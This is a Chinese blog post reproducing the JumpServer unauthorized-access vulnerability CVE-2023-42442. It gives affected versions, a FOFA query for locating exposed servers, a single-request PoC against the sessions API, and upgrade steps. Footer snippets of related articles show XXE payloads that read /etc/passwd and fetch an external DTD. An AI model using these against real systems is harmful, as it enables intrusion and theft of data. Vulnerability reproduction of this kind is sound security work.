首页 > 其他分享 >【漏洞复现】JumpServer未授权访问漏洞(CVE-2023-42442)

【漏洞复现】JumpServer未授权访问漏洞(CVE-2023-42442)

时间:2023-09-18 22:02:59浏览次数:50  
标签:jmsctl JumpServer 漏洞 sh 2023 授权 jumpserver

1、简介

JumpServer是一款符合4A规范的开源堡垒机,帮助企业以更安全的方式管控和登录各种类型的资产,实现事前授权、事中监察、事后审计,满足等保合规要求。

2、漏洞描述

JumpServer 在 3.0.0-3.6.3 版本存在未授权访问漏洞。由于系统权限配置存在不合理,导致未授权攻击者可以直接访问 /api/v1/terminal/sessions/ 相关路由
漏洞公告:https://github.com/jumpserver/jumpserver/security/advisories/GHSA-633x-3f4f-v9rw

3、受影响版本

3.0.0 <= JumpServer <= 3.6.3

4、FOFA语

fofa:app="JumpServer-堡垒机"

5、漏洞复现

POC

GET /api/v1/terminal/sessions/ HTTP/1.1
Host: XXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)

6、整改建议

升级到安全版本:JumpServer >= 3.5.5 JumpServer >= 3.6.4

./jmsctl.sh backup_db  #备份数据库
./jmsctl.sh check_update  #检查可用更新
./jmsctl.sh upgrade [version]  #升级指定版本
./jmsctl.sh start  #启动jumpserver

标签:jmsctl,JumpServer,漏洞,sh,2023,授权,jumpserver
From: https://www.cnblogs.com/fuchangjiang/p/17713181.html

相关文章

  • 2023.9.18
    通过java的自带类写出了登录系统的框架,其中SWing类其中包含了设置框,设置字体以及颜色,还可以设置绝对位置。packagedenglujiemian;importjavax.swing.*;importjava.awt.*;importjava.util.ArrayList;importjava.util.Random;publicclassdenglu{publicstaticvoidma......
  • 日常记录--day5--2023-9月19日--周一
    日程:今天是满课的一天,7点起床,整理了一下内务,吃了个早饭去上课,早上是工程实训课,课上我造了个小铁篮子,还挺有意思。中午小睡一个小时,下午上Java,Java课上的习题奇奇怪怪,其中的倒计时功能还挺棘手,Java中的倒计时与C++不同,还挺头疼,晚上7-9点继续力扣,学了会Javaweb。学了什么:Javaweb让......
  • 2023/9/18
    package验证码;importjavax.swing.*;importjava.awt.*;importjava.util.Random;importjava.util.Scanner;publicclass验证码{publicstaticvoidmain(String[]args){验证码log=new验证码();log.login();}publicvoidlogin(){JF......
  • 2023CSP-J游寄
    Day-3水帖。Day-2水帖(寒)。Day-1还是水帖。。。Day0考前在比赛开始前水了会帖。。。星期六基本都在补课,早上的课请了假。跑到三楼的\(304\)考场,小学生扎堆。考中感觉今年比较简单一点点。有些不会的题都蒙对了。考完后的一个小时都在摆烂,也就翻翻卷子,看看时间,无......
  • The 2023 ICPC Asia Regionals Online Contest (1) ADI
    The2023ICPCAsiaRegionalsOnlineContest(1)AQualifiersRankingRules思路:按位次为第一关键字,场次为第二关键字排序即可。//AConemoretimes//nndbk#include<bits/stdc++.h>usingnamespacestd;typedeflonglongll;constintmod=1e9+7;constintN......
  • 2023年VR虚拟现实的10个应用行业
    1.医疗保健现代医疗保健的培训方式离不开VR虚拟现实。。由于医疗行业的特殊性,不允许拿大量的病人来练手,但医疗又非常注重实践,一些新手医生就缺乏锻炼的机会,而VR虚拟现实技术很好的解决了这一问题。医生可以在高清晰、低延时、高逼真的虚拟环境中学习和练习,减少了对传统手术中对于......
  • 2023/9/18 虹日刊 关键词:云计算
    ......
  • WebStorm 2023:JavaScript开发者的终极利器
    WebStorm是JetBrains公司开发的一款强大的JavaScript开发工具,为前端开发者提供了丰富的功能和智能,帮助他们提高开发效率、降低出错率并提高代码质量。→→↓↓载RubyMine2023mac+win版代码提示与自动补全:WebStorm能够根据用户输入的内容,提供代码提示与自动补全功能,减少用户......
  • RubyMine 2023:高效Ruby编码工具,适用于macOS和Windows
    RubyMine是JetBrains开发的一款为Ruby开发者量身定制的集成开发环境(IDE)。它为Ruby语言提供了全面的支持,包括代码编辑、调试、测试和集成版本控制系统等功能,帮助开发者更加高效地进行Ruby编程。→→↓↓载RubyMine2023mac+win版代码编辑与自动补全:RubyMine提供了强大的代码编......
  • WEB漏洞-XXE&XML之利用检测绕过全解
    XML内容: <?xmlversion="1.0"?> <!DOCTYPEa[ <!ENTITY%dSYSTEM“file:///etc/passwd”>%d; ]> <c>%d;</c> XML内容 <?xmlversion=’1.0’?> <!DOCTYPEa[ <!ENTITY%dSYSTEM“http://abc.com/evil.dt......